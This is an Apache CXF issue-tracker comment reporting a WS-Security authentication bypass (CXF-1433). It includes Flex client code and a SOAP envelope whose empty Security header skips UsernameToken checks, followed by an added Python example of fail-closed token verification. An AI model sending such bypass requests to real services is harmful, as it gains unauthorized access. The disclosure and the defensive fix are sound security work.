[ https://issues.apache.org/jira/browse/CXF-1433?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12569312#action_12569312 ]
Loïc FRERING commented on CXF-1433:
-----------------------------------
Hello Fred,
Here is the Flex code that permits me to use the web service without
authentication:
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" layout="absolute">
    <mx:WebService id="helloService"
                   wsdl="http://localhost/webservice/HelloWorld?wsdl"
                   useProxy="false"
                   load="headers();">
        <mx:operation name="sayHi">
            <mx:request>
                <name>Loïc</name>
            </mx:request>
        </mx:operation>
    </mx:WebService>
    <mx:Script>
        <![CDATA[
            import mx.rpc.soap.SOAPHeader;
            //import com.adobe.crypto.WSSEUsernameToken;
            private var wsseHeader:SOAPHeader;
            public var fromXML;
            public function headers():void {
                var wsse:Namespace = new Namespace("http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd");
                var wsseSecurity:QName = new QName(wsse.uri, "Security");
                // Builds a wsse:Security header whose only child is a placeholder
                // element; no UsernameToken is added.
                wsseHeader = new SOAPHeader(wsseSecurity, {"wsse":"Security"});
                // Here would be the code to generate the WS-Security headers,
                // but it is not....
                helloService.addHeader(wsseHeader);
            }
        ]]>
    </mx:Script>
    <mx:DataGrid id="dgTopPosts" width="400" verticalCenter="-66"
                 horizontalCenter="0" dataProvider="{helloService.sayHi.lastResult}">
        <mx:columns>
            <mx:DataGridColumn headerText="Hi" dataField="return" />
        </mx:columns>
    </mx:DataGrid>
    <mx:Button label="Button" click="helloService.sayHi.send();"
               verticalCenter="-125.5" horizontalCenter="0" />
</mx:Application>
> WS-Security vulnerability
> -------------------------
>
> Key: CXF-1433
> URL: https://issues.apache.org/jira/browse/CXF-1433
> Project: CXF
> Issue Type: Bug
> Components: WS-* Components
> Affects Versions: 2.0.3
> Environment: Tomcat 5.5, Spring 2 and CXF 2.0.3 for the server and
> Flex WS-client
> Reporter: Loïc FRERING
> Priority: Critical
>
> It is possible to bypass the security checks configured with WS-Security.
> Server configured with a Username Token WS-Security authentication with
> Spring:
> <jaxws:endpoint id="helloWorld" implementor="service.impl.HelloWorldImpl"
>                 address="/HelloWorld">
>     <jaxws:inInterceptors>
>         <bean class="org.apache.cxf.binding.soap.saaj.SAAJInInterceptor"/>
>         <bean class="org.apache.cxf.ws.security.wss4j.WSS4JInInterceptor">
>             <constructor-arg>
>                 <map>
>                     <entry key="action" value="UsernameToken"/>
>                     <entry key="passwordType" value="PasswordDigest"/>
>                     <entry key="passwordCallbackClass"
>                            value="service.security.ServerPasswordHandler"/>
>                 </map>
>             </constructor-arg>
>         </bean>
>         <bean class="org.apache.cxf.interceptor.LoggingInInterceptor"/>
>         <bean class="org.apache.cxf.interceptor.LoggingOutInterceptor"/>
>     </jaxws:inInterceptors>
> </jaxws:endpoint>
> When a SOAP message is created and sent with the following header, the server
> does not process the authentication and returns the response:
> <SOAP-ENV:Envelope>
>     <SOAP-ENV:Header>
>         <ns0:Security>
>             <ns0:wsse>Security</ns0:wsse>
>         </ns0:Security>
>     </SOAP-ENV:Header>
>     <SOAP-ENV:Body>
>         <ns0:sayHi>
>             <name>Loïc</name>
>         </ns0:sayHi>
>     </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
> So it is possible to bypass all the security checks configured and to use it.
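The defect the report describes is a fail-open check: a wsse:Security header that contains no UsernameToken at all is accepted, and the body is dispatched to the implementor. The following is an added example written for this page, not CXF or WSS4J code, showing the fail-closed check a server configured with action=UsernameToken and passwordType=PasswordDigest has to perform: require the token, require every field, and verify the digest against the password the callback supplies, rejecting anything short of that. The envelope from the report is reproduced with the ns0 prefix bound to the WSSE 1.0 namespace (the report does not show that declaration, so that binding is an assumption), the PASSWORDS dictionary stands in for the page's service.security.ServerPasswordHandler, and the user, password, nonce and Created values are constructed.

```python
"""Fail-closed verification of a WS-Security UsernameToken (added example, not CXF code)."""
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
DIGEST = ("http://docs.oasis-open.org/wss/2004/01/"
          "oasis-200401-wss-username-token-profile-1.0#PasswordDigest")

# Constructed stand-in for the report's service.security.ServerPasswordHandler:
# the server-side lookup of a user's cleartext password.
PASSWORDS = {"loic": "s3cret"}


def password_digest(nonce_b64, created, password):
    """Password_Digest = Base64(SHA-1(nonce + created + password)) per UsernameToken Profile 1.0."""
    raw = base64.b64decode(nonce_b64) + created.encode() + password.encode()
    return base64.b64encode(hashlib.sha1(raw).digest()).decode()


def check_username_token(envelope):
    """Return (accepted, reason). Anything short of a complete, verified token is rejected."""
    root = ET.fromstring(envelope)
    header = root.find(f"{{{SOAP}}}Header")
    if header is None:
        return False, "no SOAP Header"
    security = header.find(f"{{{WSSE}}}Security")
    if security is None:
        return False, "no wsse:Security header"
    token = security.find(f"{{{WSSE}}}UsernameToken")
    if token is None:
        # The CXF-1433 case: a Security header with no token inside it.
        return False, "Security header carries no UsernameToken"
    username = token.findtext(f"{{{WSSE}}}Username")
    password = token.find(f"{{{WSSE}}}Password")
    nonce = token.findtext(f"{{{WSSE}}}Nonce")
    created = token.findtext(f"{{{WSU}}}Created")
    if not (username and nonce and created) or password is None:
        return False, "UsernameToken incomplete"
    if password.get("Type") != DIGEST:
        return False, "password is not a PasswordDigest"
    known = PASSWORDS.get(username)
    if known is None:
        return False, "unknown user"
    expected = password_digest(nonce, created, known)
    if not hmac.compare_digest(password.text or "", expected):
        return False, "digest mismatch"
    return True, f"authenticated {username}"


# The header from the report; ns0 is bound to the WSSE namespace here (assumed).
BYPASS_ENVELOPE = f"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP}" xmlns:ns0="{WSSE}">
  <SOAP-ENV:Header>
    <ns0:Security>
      <ns0:wsse>Security</ns0:wsse>
    </ns0:Security>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body><sayHi><name>Loïc</name></sayHi></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def valid_envelope(username, password, nonce=b"12345678", created="2008-03-01T12:00:00Z"):
    """Constructed request carrying a complete UsernameToken with a PasswordDigest."""
    nonce_b64 = base64.b64encode(nonce).decode()
    digest = password_digest(nonce_b64, created, password)
    return f"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP}" xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}">
  <SOAP-ENV:Header>
    <wsse:Security>
      <wsse:UsernameToken>
        <wsse:Username>{username}</wsse:Username>
        <wsse:Password Type="{DIGEST}">{digest}</wsse:Password>
        <wsse:Nonce>{nonce_b64}</wsse:Nonce>
        <wsu:Created>{created}</wsu:Created>
      </wsse:UsernameToken>
    </wsse:Security>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body><sayHi><name>{username}</name></sayHi></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


if __name__ == "__main__":
    print(check_username_token(BYPASS_ENVELOPE))
    print(check_username_token(valid_envelope("loic", "s3cret")))
    print(check_username_token(valid_envelope("loic", "wrong")))
```

The order of the checks is the point: the mere presence of a Security element proves nothing, so the interceptor must look for the token the configured action demands and refuse the message when it is absent, before the body ever reaches the service. A production check would additionally reject stale Created timestamps and replayed nonces, which this example leaves out.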